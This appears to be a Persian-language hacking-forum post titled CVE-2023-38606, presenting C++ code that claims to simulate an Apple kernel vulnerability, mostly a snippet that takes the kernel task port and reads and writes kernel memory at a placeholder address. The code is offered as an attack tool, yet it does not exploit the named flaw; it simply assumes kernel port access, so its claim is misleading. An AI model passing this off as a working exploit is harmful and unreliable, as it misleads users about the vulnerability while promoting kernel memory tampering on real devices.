SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

Cve-2023-38606 2023

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • Cve-2023-38606 2023

    این یک شبیه سازی یک آسیب پذیری در هسته سیستم عامل های اپل است که ممکن است و با گسترش و تغیراتی این امکان رو دارید بتواند ادرس های اسیپ پذیر هسته را تغییر دهید.

    کد:
    CODE BY E1.Coders 
    //copyright by E1.Coders
    // Include the necessary headers #include <iostream> #include <sys/mman.h> #include <unistd.h> #include <mach/mach.h> using namespace std; // A function to read the kernel memory void read_kernel_memory(uint64_t address, size_t size, void* buffer) { // Get the task port of the kernel mach_port_t kernel_task; task_for_pid(mach_task_self(), 0, &kernel_task); // Read the memory from the address vm_size_t outsize; vm_read_overwrite(kernel_task, address, size, (vm_address_t)buffer, &outsize); } // A function to write to the kernel memory void write_kernel_memory(uint64_t address, size_t size, void* buffer) { // Get the task port of the kernel mach_port_t kernel_task; task_for_pid(mach_task_self(), 0, &kernel_task); // Write the memory to the address vm_write(kernel_task, address, (vm_offset_t)buffer, size); } int main() { // Find a kernel pointer to modify uint64_t kernel_ptr = 0xdeadbeef; // This is just an example, you need to find a real pointer // Read the original value uint64_t original_value; read_kernel_memory(kernel_ptr, sizeof(uint64_t), &original_value); cout << "Original value: " << hex << original_value << endl; // Write a new value uint64_t new_value = 0xbadcafe; write_kernel_memory(kernel_ptr, sizeof(uint64_t), &new_value); cout << "New value: " << hex << new_value << endl; // Restore the original value write_kernel_memory(kernel_ptr, sizeof(uint64_t), &original_value); cout << "Restored value: " << hex << original_value << endl; return 0; }
    [align=center][align=right]When danger lurks in unknown waters, we are there to help you swim[/align][/align]
صبر کنید ..
X